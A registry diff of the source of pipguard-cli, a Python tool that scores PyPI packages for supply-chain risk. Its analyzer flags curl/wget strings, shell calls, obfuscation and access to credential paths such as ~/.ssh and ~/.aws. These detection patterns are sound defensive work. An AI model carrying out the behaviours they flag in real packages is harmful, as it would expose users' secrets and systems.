pipguard-cli 0.1.0__tar.gz
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- pipguard_cli-0.1.0/.gitignore +9 -0
- pipguard_cli-0.1.0/PKG-INFO +8 -0
- pipguard_cli-0.1.0/pipguard/__init__.py +1 -0
- pipguard_cli-0.1.0/pipguard/analyzer.py +116 -0
- pipguard_cli-0.1.0/pipguard/cache.py +51 -0
- pipguard_cli-0.1.0/pipguard/display.py +90 -0
- pipguard_cli-0.1.0/pipguard/github.py +66 -0
- pipguard_cli-0.1.0/pipguard/main.py +322 -0
- pipguard_cli-0.1.0/pipguard/osv.py +19 -0
- pipguard_cli-0.1.0/pipguard/pypi.py +84 -0
- pipguard_cli-0.1.0/pipguard/scorer.py +84 -0
- pipguard_cli-0.1.0/plan.md +165 -0
- pipguard_cli-0.1.0/pyproject.toml +20 -0
|
@@ -0,0 +1 @@
|
|
|
1
|
+
__version__ = "0.1.0"
|
|
@@ -0,0 +1,116 @@
|
|
|
1
|
+
import ast
|
|
2
|
+
import io
|
|
3
|
+
import tarfile
|
|
4
|
+
from pathlib import Path
|
|
5
|
+
|
|
6
|
+
import httpx
|
|
7
|
+
|
|
8
|
+
# Files that execute automatically during install or first import
|
|
9
|
+
TARGET_FILES = {"setup.py", "pyproject.toml", "__init__.py"}
|
|
10
|
+
|
|
11
|
+
_NETWORK_PATTERNS = [
|
|
12
|
+
"requests.", "urllib.", "httpx.", "http.client",
|
|
13
|
+
"ftplib", "smtplib", "socket.",
|
|
14
|
+
]
|
|
15
|
+
_SHELL_PATTERNS = ["os.system", "subprocess.", "commands.getoutput"]
|
|
16
|
+
_HOME_STRINGS = ["~/.ssh", "~/.aws", "~/.config", "~/.gnupg", "~/.netrc"]
|
|
17
|
+
|
|
18
|
+
|
|
19
|
+
class _FlagVisitor(ast.NodeVisitor):
|
|
20
|
+
def __init__(self):
|
|
21
|
+
self.flags: dict[str, bool] = {
|
|
22
|
+
"network_call": False,
|
|
23
|
+
"env_access": False,
|
|
24
|
+
"home_dir_access": False,
|
|
25
|
+
"shell_exec": False,
|
|
26
|
+
"base64_obfuscation": False,
|
|
27
|
+
"dynamic_exec": False,
|
|
28
|
+
}
|
|
29
|
+
|
|
30
|
+
def visit_Call(self, node: ast.Call):
|
|
31
|
+
func_str = ast.unparse(node)
|
|
32
|
+
|
|
33
|
+
if any(p in func_str for p in _NETWORK_PATTERNS):
|
|
34
|
+
self.flags["network_call"] = True
|
|
35
|
+
|
|
36
|
+
# curl/wget buried in string args
|
|
37
|
+
for child in ast.walk(node):
|
|
38
|
+
if isinstance(child, ast.Constant) and isinstance(child.value, str):
|
|
39
|
+
if any(s in child.value for s in ("curl ", "wget ", "http://", "https://")):
|
|
40
|
+
self.flags["network_call"] = True
|
|
41
|
+
|
|
42
|
+
if "os.environ" in func_str or "os.getenv" in func_str:
|
|
43
|
+
self.flags["env_access"] = True
|
|
44
|
+
|
|
45
|
+
if any(p in func_str for p in _SHELL_PATTERNS):
|
|
46
|
+
self.flags["shell_exec"] = True
|
|
47
|
+
|
|
48
|
+
if func_str.startswith("eval(") or func_str.startswith("exec("):
|
|
49
|
+
self.flags["dynamic_exec"] = True
|
|
50
|
+
self.flags["shell_exec"] = True
|
|
51
|
+
|
|
52
|
+
if "base64.b64decode" in func_str or "base64.decodebytes" in func_str:
|
|
53
|
+
self.flags["base64_obfuscation"] = True
|
|
54
|
+
|
|
55
|
+
# getattr-based obfuscation: getattr(os, 'sys'+'tem')(...)
|
|
56
|
+
if (
|
|
57
|
+
isinstance(node.func, ast.Call)
|
|
58
|
+
and isinstance(node.func.func, ast.Name)
|
|
59
|
+
and node.func.func.id == "getattr"
|
|
60
|
+
):
|
|
61
|
+
self.flags["dynamic_exec"] = True
|
|
62
|
+
|
|
63
|
+
self.generic_visit(node)
|
|
64
|
+
|
|
65
|
+
def visit_Attribute(self, node: ast.Attribute):
|
|
66
|
+
full = ast.unparse(node)
|
|
67
|
+
if "expanduser" in full or ".home()" in full:
|
|
68
|
+
self.flags["home_dir_access"] = True
|
|
69
|
+
self.generic_visit(node)
|
|
70
|
+
|
|
71
|
+
def visit_Constant(self, node: ast.Constant):
|
|
72
|
+
if isinstance(node.value, str):
|
|
73
|
+
if any(node.value.startswith(p) for p in _HOME_STRINGS):
|
|
74
|
+
self.flags["home_dir_access"] = True
|
|
75
|
+
self.generic_visit(node)
|
|
76
|
+
|
|
77
|
+
|
|
78
|
+
def _analyze_source(source: str) -> dict[str, bool]:
|
|
79
|
+
try:
|
|
80
|
+
tree = ast.parse(source)
|
|
81
|
+
except SyntaxError:
|
|
82
|
+
return {}
|
|
83
|
+
visitor = _FlagVisitor()
|
|
84
|
+
visitor.visit(tree)
|
|
85
|
+
return visitor.flags
|
|
86
|
+
|
|
87
|
+
|
|
88
|
+
async def analyze_tarball(tarball_url: str) -> dict[str, bool]:
|
|
89
|
+
"""Download source tarball and run AST analysis on install-time files."""
|
|
90
|
+
async with httpx.AsyncClient(timeout=30, follow_redirects=True) as client:
|
|
91
|
+
r = await client.get(tarball_url)
|
|
92
|
+
r.raise_for_status()
|
|
93
|
+
|
|
94
|
+
combined: dict[str, bool] = {
|
|
95
|
+
"network_call": False,
|
|
96
|
+
"env_access": False,
|
|
97
|
+
"home_dir_access": False,
|
|
98
|
+
"shell_exec": False,
|
|
99
|
+
"base64_obfuscation": False,
|
|
100
|
+
"dynamic_exec": False,
|
|
101
|
+
}
|
|
102
|
+
|
|
103
|
+
buf = io.BytesIO(r.content)
|
|
104
|
+
with tarfile.open(fileobj=buf, mode="r:gz") as tar:
|
|
105
|
+
for member in tar.getmembers():
|
|
106
|
+
if Path(member.name).name not in TARGET_FILES:
|
|
107
|
+
continue
|
|
108
|
+
f = tar.extractfile(member)
|
|
109
|
+
if f is None:
|
|
110
|
+
continue
|
|
111
|
+
source = f.read().decode("utf-8", errors="ignore")
|
|
112
|
+
for key, val in _analyze_source(source).items():
|
|
113
|
+
if val:
|
|
114
|
+
combined[key] = True
|
|
115
|
+
|
|
116
|
+
return combined
|
|
@@ -0,0 +1,51 @@
|
|
|
1
|
+
import json
|
|
2
|
+
import sqlite3
|
|
3
|
+
import time
|
|
4
|
+
from pathlib import Path
|
|
5
|
+
|
|
6
|
+
CACHE_DIR = Path.home() / ".pipguard"
|
|
7
|
+
CACHE_DB = CACHE_DIR / "cache.db"
|
|
8
|
+
|
|
9
|
+
TTL_TRUST = 86_400 # 24 hours
|
|
10
|
+
TTL_VULN = 21_600 # 6 hours
|
|
11
|
+
|
|
12
|
+
|
|
13
|
+
def _conn() -> sqlite3.Connection:
|
|
14
|
+
CACHE_DIR.mkdir(exist_ok=True)
|
|
15
|
+
con = sqlite3.connect(CACHE_DB)
|
|
16
|
+
con.execute("""
|
|
17
|
+
CREATE TABLE IF NOT EXISTS cache (
|
|
18
|
+
key TEXT PRIMARY KEY,
|
|
19
|
+
value TEXT NOT NULL,
|
|
20
|
+
expires_at REAL NOT NULL
|
|
21
|
+
)
|
|
22
|
+
""")
|
|
23
|
+
con.commit()
|
|
24
|
+
return con
|
|
25
|
+
|
|
26
|
+
|
|
27
|
+
def get(key: str) -> dict | None:
|
|
28
|
+
with _conn() as con:
|
|
29
|
+
row = con.execute(
|
|
30
|
+
"SELECT value, expires_at FROM cache WHERE key = ?", (key,)
|
|
31
|
+
).fetchone()
|
|
32
|
+
if row is None:
|
|
33
|
+
return None
|
|
34
|
+
value, expires_at = row
|
|
35
|
+
if time.time() > expires_at:
|
|
36
|
+
return None
|
|
37
|
+
return json.loads(value)
|
|
38
|
+
|
|
39
|
+
|
|
40
|
+
def set(key: str, value: dict, ttl: int) -> None:
|
|
41
|
+
with _conn() as con:
|
|
42
|
+
con.execute(
|
|
43
|
+
"INSERT OR REPLACE INTO cache (key, value, expires_at) VALUES (?, ?, ?)",
|
|
44
|
+
(key, json.dumps(value), time.time() + ttl),
|
|
45
|
+
)
|
|
46
|
+
|
|
47
|
+
|
|
48
|
+
def clear_vuln() -> None:
|
|
49
|
+
"""Wipe all CVE/vulnerability cache entries (for pipguard update --force)."""
|
|
50
|
+
with _conn() as con:
|
|
51
|
+
con.execute("DELETE FROM cache WHERE key LIKE 'osv:%'")
|
|
@@ -0,0 +1,90 @@
|
|
|
1
|
+
from rich.console import Console
|
|
2
|
+
from rich.table import Table
|
|
3
|
+
|
|
4
|
+
console = Console()
|
|
5
|
+
|
|
6
|
+
_VERDICT_COLOR = {"LOW": "green", "MEDIUM": "yellow", "HIGH": "red"}
|
|
7
|
+
_VERDICT_LABEL = {"LOW": "LOW RISK", "MEDIUM": "MEDIUM RISK", "HIGH": "HIGH RISK"}
|
|
8
|
+
|
|
9
|
+
|
|
10
|
+
def show_report(
|
|
11
|
+
package: str,
|
|
12
|
+
metadata: dict,
|
|
13
|
+
download_stats: dict,
|
|
14
|
+
vulns: list[dict],
|
|
15
|
+
analysis_flags: dict,
|
|
16
|
+
breakdown: dict,
|
|
17
|
+
cached: bool = False,
|
|
18
|
+
) -> None:
|
|
19
|
+
cache_note = " [dim](cached)[/dim]" if cached else ""
|
|
20
|
+
console.print(f"\nAnalyzing [bold]{package}[/bold]{cache_note}...\n")
|
|
21
|
+
|
|
22
|
+
# ── Trust score ──────────────────────────────────────────────
|
|
23
|
+
console.rule("[bold]TRUST SCORE[/bold]")
|
|
24
|
+
t = Table(box=None, show_header=False, padding=(0, 2))
|
|
25
|
+
t.add_column(width=28)
|
|
26
|
+
t.add_column()
|
|
27
|
+
|
|
28
|
+
age = metadata.get("age_days")
|
|
29
|
+
age_str = f"{age}d" if age is not None else "unknown"
|
|
30
|
+
if age is None:
|
|
31
|
+
age_icon = "❓"
|
|
32
|
+
elif age < 30:
|
|
33
|
+
age_icon = "🔴"
|
|
34
|
+
elif age < 90:
|
|
35
|
+
age_icon = "⚠️"
|
|
36
|
+
else:
|
|
37
|
+
age_icon = "✅"
|
|
38
|
+
t.add_row("Package age:", f"{age_str} {age_icon}")
|
|
39
|
+
|
|
40
|
+
t.add_row(
|
|
41
|
+
"GitHub repo:",
|
|
42
|
+
"✅ linked" if metadata.get("github_url") else "🔴 none",
|
|
43
|
+
)
|
|
44
|
+
|
|
45
|
+
spike = download_stats.get("spike_pct")
|
|
46
|
+
last_month = download_stats.get("last_month") or 0
|
|
47
|
+
if spike and spike > 300 and last_month < 50_000:
|
|
48
|
+
t.add_row("Download spike:", f"+{spike:.0f}% ⚠️")
|
|
49
|
+
else:
|
|
50
|
+
t.add_row("Download spike:", "normal ✅")
|
|
51
|
+
|
|
52
|
+
if vulns:
|
|
53
|
+
t.add_row("Known vulns:", f"🔴 {len(vulns)} found ({vulns[0]['id']})")
|
|
54
|
+
else:
|
|
55
|
+
t.add_row("Known vulns:", "✅ none")
|
|
56
|
+
|
|
57
|
+
console.print(t)
|
|
58
|
+
|
|
59
|
+
# ── Code analysis ────────────────────────────────────────────
|
|
60
|
+
console.rule("[bold]CODE ANALYSIS[/bold]")
|
|
61
|
+
|
|
62
|
+
if not analysis_flags:
|
|
63
|
+
console.print(" [dim]No source tarball available — code analysis skipped[/dim]")
|
|
64
|
+
else:
|
|
65
|
+
a = Table(box=None, show_header=False, padding=(0, 2))
|
|
66
|
+
a.add_column(width=28)
|
|
67
|
+
a.add_column()
|
|
68
|
+
|
|
69
|
+
def flag_row(label: str, key: str):
|
|
70
|
+
found = analysis_flags.get(key, False)
|
|
71
|
+
a.add_row(label, "🔴 FOUND" if found else "✅ NOT FOUND")
|
|
72
|
+
|
|
73
|
+
flag_row("Network requests:", "network_call")
|
|
74
|
+
flag_row("Env var access:", "env_access")
|
|
75
|
+
flag_row("Shell execution:", "shell_exec")
|
|
76
|
+
flag_row("Base64 obfuscation:", "base64_obfuscation")
|
|
77
|
+
flag_row("Home dir access:", "home_dir_access")
|
|
78
|
+
console.print(a)
|
|
79
|
+
|
|
80
|
+
# ── Verdict ──────────────────────────────────────────────────
|
|
81
|
+
verdict = breakdown["verdict"]
|
|
82
|
+
score = breakdown["score"]
|
|
83
|
+
color = _VERDICT_COLOR[verdict]
|
|
84
|
+
console.rule()
|
|
85
|
+
console.print(
|
|
86
|
+
f" VERDICT: [{color}]{_VERDICT_LABEL[verdict]}[/{color}]"
|
|
87
|
+
f" (Score: [bold]{score}[/bold])"
|
|
88
|
+
)
|
|
89
|
+
console.rule()
|
|
90
|
+
console.print()
|
|
@@ -0,0 +1,66 @@
|
|
|
1
|
+
import re
|
|
2
|
+
|
|
3
|
+
import httpx
|
|
4
|
+
|
|
5
|
+
# Classifiers that indicate a package has no business making network calls at install time
|
|
6
|
+
PURE_PYTHON_CLASSIFIERS = {
|
|
7
|
+
"Programming Language :: Python :: Implementation :: CPython",
|
|
8
|
+
"Topic :: Utilities",
|
|
9
|
+
"Topic :: Text Processing",
|
|
10
|
+
"Topic :: Software Development :: Libraries :: Python Modules",
|
|
11
|
+
}
|
|
12
|
+
|
|
13
|
+
# Classifiers where network calls are plausible
|
|
14
|
+
NETWORK_CLASSIFIERS = {
|
|
15
|
+
"Topic :: Internet :: WWW/HTTP",
|
|
16
|
+
"Topic :: System :: Networking",
|
|
17
|
+
"Topic :: Scientific/Engineering :: Artificial Intelligence",
|
|
18
|
+
"Topic :: Software Development :: Build Tools",
|
|
19
|
+
}
|
|
20
|
+
|
|
21
|
+
_NETWORK_KEYWORDS = [
|
|
22
|
+
"download", "binary", "binaries", "pre-built", "native extension",
|
|
23
|
+
"model weights", "fetches", "auto-update", "update check",
|
|
24
|
+
]
|
|
25
|
+
_PURE_KEYWORDS = ["pure python", "pure-python", "zero dependencies", "no network", "offline"]
|
|
26
|
+
|
|
27
|
+
|
|
28
|
+
def classify_from_classifiers(classifiers: list[str]) -> str:
|
|
29
|
+
"""
|
|
30
|
+
Returns 'pure_python', 'network_expected', or 'ambiguous' based on PyPI classifiers.
|
|
31
|
+
This is free — classifiers are already in the PyPI JSON response.
|
|
32
|
+
"""
|
|
33
|
+
classifier_set = set(classifiers)
|
|
34
|
+
has_pure = bool(classifier_set & PURE_PYTHON_CLASSIFIERS)
|
|
35
|
+
has_network = bool(classifier_set & NETWORK_CLASSIFIERS)
|
|
36
|
+
|
|
37
|
+
if has_pure and not has_network:
|
|
38
|
+
return "pure_python"
|
|
39
|
+
if has_network:
|
|
40
|
+
return "network_expected"
|
|
41
|
+
return "ambiguous"
|
|
42
|
+
|
|
43
|
+
|
|
44
|
+
async def fetch_readme_classification(github_url: str) -> str:
|
|
45
|
+
"""
|
|
46
|
+
Only called when classifiers are ambiguous or network_expected.
|
|
47
|
+
Returns 'network_expected', 'pure_python', or 'unknown'.
|
|
48
|
+
"""
|
|
49
|
+
match = re.match(r"https://github\.com/([^/]+/[^/\s]+)", github_url)
|
|
50
|
+
if not match:
|
|
51
|
+
return "unknown"
|
|
52
|
+
|
|
53
|
+
repo = match.group(1).rstrip("/")
|
|
54
|
+
readme_url = f"https://raw.githubusercontent.com/{repo}/HEAD/README.md"
|
|
55
|
+
|
|
56
|
+
async with httpx.AsyncClient(timeout=10) as client:
|
|
57
|
+
r = await client.get(readme_url)
|
|
58
|
+
if r.status_code != 200:
|
|
59
|
+
return "unknown"
|
|
60
|
+
text = r.text.lower()
|
|
61
|
+
|
|
62
|
+
if any(kw in text for kw in _NETWORK_KEYWORDS):
|
|
63
|
+
return "network_expected"
|
|
64
|
+
if any(kw in text for kw in _PURE_KEYWORDS):
|
|
65
|
+
return "pure_python"
|
|
66
|
+
return "unknown"
|
|
@@ -0,0 +1,322 @@
|
|
|
1
|
+
import asyncio
|
|
2
|
+
import subprocess
|
|
3
|
+
import sys
|
|
4
|
+
from pathlib import Path
|
|
5
|
+
from typing import Optional
|
|
6
|
+
|
|
7
|
+
import typer
|
|
8
|
+
from rich.prompt import Confirm
|
|
9
|
+
|
|
10
|
+
from pipguard import analyzer, cache, display, github, osv, pypi, scorer
|
|
11
|
+
from pipguard.display import console
|
|
12
|
+
|
|
13
|
+
app = typer.Typer(
|
|
14
|
+
help="pipguard — supply chain attack prevention for pip installs.",
|
|
15
|
+
add_completion=False,
|
|
16
|
+
)
|
|
17
|
+
|
|
18
|
+
|
|
19
|
+
async def _analyze(package: str, version: str | None, no_cache: bool) -> tuple[dict, bool]:
|
|
20
|
+
"""Core analysis pipeline. Returns (result_dict, was_cached)."""
|
|
21
|
+
cache_key = f"full:{package}:{version or 'latest'}"
|
|
22
|
+
|
|
23
|
+
if not no_cache:
|
|
24
|
+
cached = cache.get(cache_key)
|
|
25
|
+
if cached:
|
|
26
|
+
return cached, True
|
|
27
|
+
|
|
28
|
+
# Fetch metadata first to resolve the exact version, then query OSV with it
|
|
29
|
+
metadata = await pypi.fetch_metadata(package, version)
|
|
30
|
+
download_stats, vulns = await asyncio.gather(
|
|
31
|
+
pypi.fetch_download_stats(package),
|
|
32
|
+
osv.check_vulns(package, metadata["version"]),
|
|
33
|
+
)
|
|
34
|
+
|
|
35
|
+
# Classifier gating: decide whether to call GitHub README
|
|
36
|
+
classifier_context = github.classify_from_classifiers(metadata["classifiers"])
|
|
37
|
+
readme_context = "unknown"
|
|
38
|
+
|
|
39
|
+
if classifier_context in ("ambiguous", "network_expected") and metadata.get("github_url"):
|
|
40
|
+
readme_context = await github.fetch_readme_classification(metadata["github_url"])
|
|
41
|
+
|
|
42
|
+
# Layer 2: AST analysis — only if source tarball exists
|
|
43
|
+
analysis_flags: dict = {}
|
|
44
|
+
if metadata.get("tarball_url"):
|
|
45
|
+
analysis_flags = await analyzer.analyze_tarball(metadata["tarball_url"])
|
|
46
|
+
|
|
47
|
+
breakdown = scorer.compute(
|
|
48
|
+
metadata, download_stats, vulns, analysis_flags, classifier_context, readme_context
|
|
49
|
+
)
|
|
50
|
+
|
|
51
|
+
result = {
|
|
52
|
+
"metadata": metadata,
|
|
53
|
+
"download_stats": download_stats,
|
|
54
|
+
"vulns": vulns,
|
|
55
|
+
"analysis_flags": analysis_flags,
|
|
56
|
+
"breakdown": breakdown,
|
|
57
|
+
}
|
|
58
|
+
|
|
59
|
+
cache.set(cache_key, result, cache.TTL_TRUST)
|
|
60
|
+
return result, False
|
|
61
|
+
|
|
62
|
+
|
|
63
|
+
@app.command()
|
|
64
|
+
def install(
|
|
65
|
+
package: str = typer.Argument(..., help="Package to analyze and install"),
|
|
66
|
+
version: Optional[str] = typer.Option(None, "--version", "-v", help="Specific version"),
|
|
67
|
+
no_cache: bool = typer.Option(False, "--no-cache", help="Bypass cache for this run"),
|
|
68
|
+
yes: bool = typer.Option(False, "--yes", "-y", help="Skip confirmation prompt"),
|
|
69
|
+
):
|
|
70
|
+
"""Analyze a package for supply chain risks, then install it."""
|
|
71
|
+
try:
|
|
72
|
+
result, cached = asyncio.run(_analyze(package, version, no_cache))
|
|
73
|
+
except Exception as e:
|
|
74
|
+
console.print(f"[red]Analysis failed: {e}[/red]")
|
|
75
|
+
raise typer.Exit(1)
|
|
76
|
+
|
|
77
|
+
display.show_report(
|
|
78
|
+
package,
|
|
79
|
+
result["metadata"],
|
|
80
|
+
result["download_stats"],
|
|
81
|
+
result["vulns"],
|
|
82
|
+
result["analysis_flags"],
|
|
83
|
+
result["breakdown"],
|
|
84
|
+
cached=cached,
|
|
85
|
+
)
|
|
86
|
+
|
|
87
|
+
verdict = result["breakdown"]["verdict"]
|
|
88
|
+
|
|
89
|
+
if verdict == "HIGH" and not yes:
|
|
90
|
+
if not Confirm.ask("Proceed anyway?", default=False):
|
|
91
|
+
raise typer.Exit(1)
|
|
92
|
+
elif verdict == "MEDIUM" and not yes:
|
|
93
|
+
if not Confirm.ask("Proceed anyway?", default=True):
|
|
94
|
+
raise typer.Exit(1)
|
|
95
|
+
|
|
96
|
+
pkg_spec = f"{package}=={result['metadata']['version']}"
|
|
97
|
+
console.print(f"Installing [bold]{pkg_spec}[/bold]...")
|
|
98
|
+
subprocess.run([sys.executable, "-m", "pip", "install", pkg_spec], check=True)
|
|
99
|
+
|
|
100
|
+
|
|
101
|
+
@app.command()
|
|
102
|
+
def info(
|
|
103
|
+
package: str = typer.Argument(..., help="Package to inspect"),
|
|
104
|
+
version: Optional[str] = typer.Option(None, "--version", "-v"),
|
|
105
|
+
no_cache: bool = typer.Option(False, "--no-cache"),
|
|
106
|
+
):
|
|
107
|
+
"""Show a risk report without installing."""
|
|
108
|
+
try:
|
|
109
|
+
result, cached = asyncio.run(_analyze(package, version, no_cache))
|
|
110
|
+
except Exception as e:
|
|
111
|
+
console.print(f"[red]Analysis failed: {e}[/red]")
|
|
112
|
+
raise typer.Exit(1)
|
|
113
|
+
|
|
114
|
+
display.show_report(
|
|
115
|
+
package,
|
|
116
|
+
result["metadata"],
|
|
117
|
+
result["download_stats"],
|
|
118
|
+
result["vulns"],
|
|
119
|
+
result["analysis_flags"],
|
|
120
|
+
result["breakdown"],
|
|
121
|
+
cached=cached,
|
|
122
|
+
)
|
|
123
|
+
|
|
124
|
+
|
|
125
|
+
@app.command()
|
|
126
|
+
def scan(
|
|
127
|
+
file: str = typer.Option("requirements.txt", "--file", "-f", help="Requirements file"),
|
|
128
|
+
ci: bool = typer.Option(False, "--ci", help="Non-interactive CI mode"),
|
|
129
|
+
fail_on: str = typer.Option("high", "--fail-on", help="Fail threshold: medium or high"),
|
|
130
|
+
no_cache: bool = typer.Option(False, "--no-cache"),
|
|
131
|
+
):
|
|
132
|
+
"""Scan all packages in a requirements file."""
|
|
133
|
+
req_path = Path(file)
|
|
134
|
+
if not req_path.exists():
|
|
135
|
+
console.print(f"[red]File not found: {file}[/red]")
|
|
136
|
+
raise typer.Exit(1)
|
|
137
|
+
|
|
138
|
+
packages: list[tuple[str, str | None]] = []
|
|
139
|
+
for line in req_path.read_text().splitlines():
|
|
140
|
+
line = line.strip()
|
|
141
|
+
if not line or line.startswith("#"):
|
|
142
|
+
continue
|
|
143
|
+
if "==" in line:
|
|
144
|
+
name, ver = line.split("==", 1)
|
|
145
|
+
packages.append((name.strip(), ver.strip()))
|
|
146
|
+
else:
|
|
147
|
+
packages.append((line, None))
|
|
148
|
+
|
|
149
|
+
fail_score = {"medium": 31, "high": 61}.get(fail_on.lower(), 61)
|
|
150
|
+
exit_code = 0
|
|
151
|
+
|
|
152
|
+
for name, ver in packages:
|
|
153
|
+
console.print(f"[dim]Scanning {name}...[/dim]")
|
|
154
|
+
try:
|
|
155
|
+
result, cached = asyncio.run(_analyze(name, ver, no_cache))
|
|
156
|
+
bd = result["breakdown"]
|
|
157
|
+
if bd["score"] >= fail_score:
|
|
158
|
+
display.show_report(
|
|
159
|
+
name,
|
|
160
|
+
result["metadata"],
|
|
161
|
+
result["download_stats"],
|
|
162
|
+
result["vulns"],
|
|
163
|
+
result["analysis_flags"],
|
|
164
|
+
bd,
|
|
165
|
+
cached=cached,
|
|
166
|
+
)
|
|
167
|
+
if ci:
|
|
168
|
+
exit_code = 1
|
|
169
|
+
else:
|
|
170
|
+
verdict = bd["verdict"]
|
|
171
|
+
color = {"LOW": "green", "MEDIUM": "yellow", "HIGH": "red"}[verdict]
|
|
172
|
+
console.print(f" [{color}]{verdict}[/{color}] {name} (score: {bd['score']})")
|
|
173
|
+
except Exception as e:
|
|
174
|
+
console.print(f"[yellow] Warning: could not scan {name}: {e}[/yellow]")
|
|
175
|
+
|
|
176
|
+
if ci and exit_code:
|
|
177
|
+
raise typer.Exit(exit_code)
|
|
178
|
+
|
|
179
|
+
|
|
180
|
+
@app.command()
|
|
181
|
+
def history():
|
|
182
|
+
"""Show recent scan results from the local cache."""
|
|
183
|
+
import json
|
|
184
|
+
import sqlite3
|
|
185
|
+
|
|
186
|
+
if not cache.CACHE_DB.exists():
|
|
187
|
+
console.print("No scan history yet.")
|
|
188
|
+
return
|
|
189
|
+
|
|
190
|
+
con = sqlite3.connect(cache.CACHE_DB)
|
|
191
|
+
rows = con.execute(
|
|
192
|
+
"SELECT key, value FROM cache WHERE key LIKE 'full:%' ORDER BY expires_at DESC LIMIT 20"
|
|
193
|
+
).fetchall()
|
|
194
|
+
con.close()
|
|
195
|
+
|
|
196
|
+
if not rows:
|
|
197
|
+
console.print("No scan history yet.")
|
|
198
|
+
return
|
|
199
|
+
|
|
200
|
+
from rich.table import Table
|
|
201
|
+
|
|
202
|
+
t = Table(title="Recent Scans", show_lines=False)
|
|
203
|
+
t.add_column("Package")
|
|
204
|
+
t.add_column("Version")
|
|
205
|
+
t.add_column("Score", justify="right")
|
|
206
|
+
t.add_column("Verdict")
|
|
207
|
+
|
|
208
|
+
for key, value in rows:
|
|
209
|
+
data = json.loads(value)
|
|
210
|
+
bd = data.get("breakdown", {})
|
|
211
|
+
_, pkg, ver = key.split(":", 2)
|
|
212
|
+
verdict = bd.get("verdict", "?")
|
|
213
|
+
score = bd.get("score", "?")
|
|
214
|
+
color = {"LOW": "green", "MEDIUM": "yellow", "HIGH": "red"}.get(verdict, "white")
|
|
215
|
+
t.add_row(pkg, ver, str(score), f"[{color}]{verdict}[/{color}]")
|
|
216
|
+
|
|
217
|
+
console.print(t)
|
|
218
|
+
|
|
219
|
+
|
|
220
|
+
@app.command()
|
|
221
|
+
def update(
|
|
222
|
+
force: bool = typer.Option(False, "--force", help="Wipe and refresh all CVE cache entries"),
|
|
223
|
+
):
|
|
224
|
+
"""Manage the pipguard cache."""
|
|
225
|
+
if force:
|
|
226
|
+
cache.clear_vuln()
|
|
227
|
+
console.print(
|
|
228
|
+
"[green]CVE cache cleared.[/green] Fresh vulnerability data will be fetched on next scan."
|
|
229
|
+
)
|
|
230
|
+
else:
|
|
231
|
+
console.print("Use [bold]pipguard update --force[/bold] to refresh CVE cache immediately.")
|
|
232
|
+
|
|
233
|
+
|
|
234
|
+
@app.command()
|
|
235
|
+
def configure():
|
|
236
|
+
"""Set up automatic pip interception for your shell."""
|
|
237
|
+
import os
|
|
238
|
+
import platform
|
|
239
|
+
|
|
240
|
+
BASH_ZSH_FUNC = """
|
|
241
|
+
# pipguard — intercept pip install
|
|
242
|
+
pip() {
|
|
243
|
+
if [ "$1" = "install" ]; then
|
|
244
|
+
pipguard install "${@:2}"
|
|
245
|
+
else
|
|
246
|
+
command pip "$@"
|
|
247
|
+
fi
|
|
248
|
+
}
|
|
249
|
+
"""
|
|
250
|
+
|
|
251
|
+
FISH_FUNC = """
|
|
252
|
+
# pipguard — intercept pip install
|
|
253
|
+
function pip
|
|
254
|
+
if test "$argv[1]" = "install"
|
|
255
|
+
pipguard install $argv[2..]
|
|
256
|
+
else
|
|
257
|
+
command pip $argv
|
|
258
|
+
end
|
|
259
|
+
end
|
|
260
|
+
"""
|
|
261
|
+
|
|
262
|
+
POWERSHELL_FUNC = """
|
|
263
|
+
# pipguard — intercept pip install
|
|
264
|
+
function pip {
|
|
265
|
+
if ($args[0] -eq "install") {
|
|
266
|
+
pipguard install @($args | Select-Object -Skip 1)
|
|
267
|
+
} else {
|
|
268
|
+
& (Get-Command pip -CommandType Application | Select-Object -First 1).Source @args
|
|
269
|
+
}
|
|
270
|
+
}
|
|
271
|
+
"""
|
|
272
|
+
|
|
273
|
+
MARKER = "# pipguard — intercept pip install"
|
|
274
|
+
|
|
275
|
+
def already_configured(path: Path) -> bool:
|
|
276
|
+
return path.exists() and MARKER in path.read_text()
|
|
277
|
+
|
|
278
|
+
def append_to(path: Path, content: str):
|
|
279
|
+
path.parent.mkdir(parents=True, exist_ok=True)
|
|
280
|
+
with open(path, "a") as f:
|
|
281
|
+
f.write(content)
|
|
282
|
+
|
|
283
|
+
# Detect shell and config file
|
|
284
|
+
if platform.system() == "Windows":
|
|
285
|
+
# PowerShell
|
|
286
|
+
# Use $PROFILE directly — it resolves to the correct path for the running PowerShell version
|
|
287
|
+
ps_profile = Path(os.environ.get("USERPROFILE", str(Path.home()))) / "Documents" / "WindowsPowerShell" / "Microsoft.PowerShell_profile.ps1"
|
|
288
|
+
if already_configured(ps_profile):
|
|
289
|
+
console.print("[yellow]pipguard is already configured in your PowerShell profile.[/yellow]")
|
|
290
|
+
return
|
|
291
|
+
append_to(ps_profile, POWERSHELL_FUNC)
|
|
292
|
+
console.print(f"[green]Done![/green] Added pip interceptor to:\n {ps_profile}")
|
|
293
|
+
console.print("\nReload your shell or run:")
|
|
294
|
+
console.print(" [bold]. $PROFILE[/bold]")
|
|
295
|
+
|
|
296
|
+
else:
|
|
297
|
+
shell = os.environ.get("SHELL", "")
|
|
298
|
+
if "zsh" in shell:
|
|
299
|
+
config = Path.home() / ".zshrc"
|
|
300
|
+
func = BASH_ZSH_FUNC
|
|
301
|
+
elif "fish" in shell:
|
|
302
|
+
config = Path.home() / ".config" / "fish" / "config.fish"
|
|
303
|
+
func = FISH_FUNC
|
|
304
|
+
else:
|
|
305
|
+
config = Path.home() / ".bashrc"
|
|
306
|
+
func = BASH_ZSH_FUNC
|
|
307
|
+
|
|
308
|
+
if already_configured(config):
|
|
309
|
+
console.print(f"[yellow]pipguard is already configured in {config}[/yellow]")
|
|
310
|
+
return
|
|
311
|
+
|
|
312
|
+
append_to(config, func)
|
|
313
|
+
console.print(f"[green]Done![/green] Added pip interceptor to:\n {config}")
|
|
314
|
+
console.print("\nReload your shell or run:")
|
|
315
|
+
console.print(f" [bold]source {config}[/bold]")
|
|
316
|
+
|
|
317
|
+
console.print("\nFrom now on, [bold]pip install <package>[/bold] will automatically run through pipguard.")
|
|
318
|
+
console.print("To remove, delete the pip() function from the config file shown above.")
|
|
319
|
+
|
|
320
|
+
|
|
321
|
+
if __name__ == "__main__":
|
|
322
|
+
app()
|
|
@@ -0,0 +1,19 @@
|
|
|
1
|
+
import httpx
|
|
2
|
+
|
|
3
|
+
OSV_URL = "https://api.osv.dev/v1/query"
|
|
4
|
+
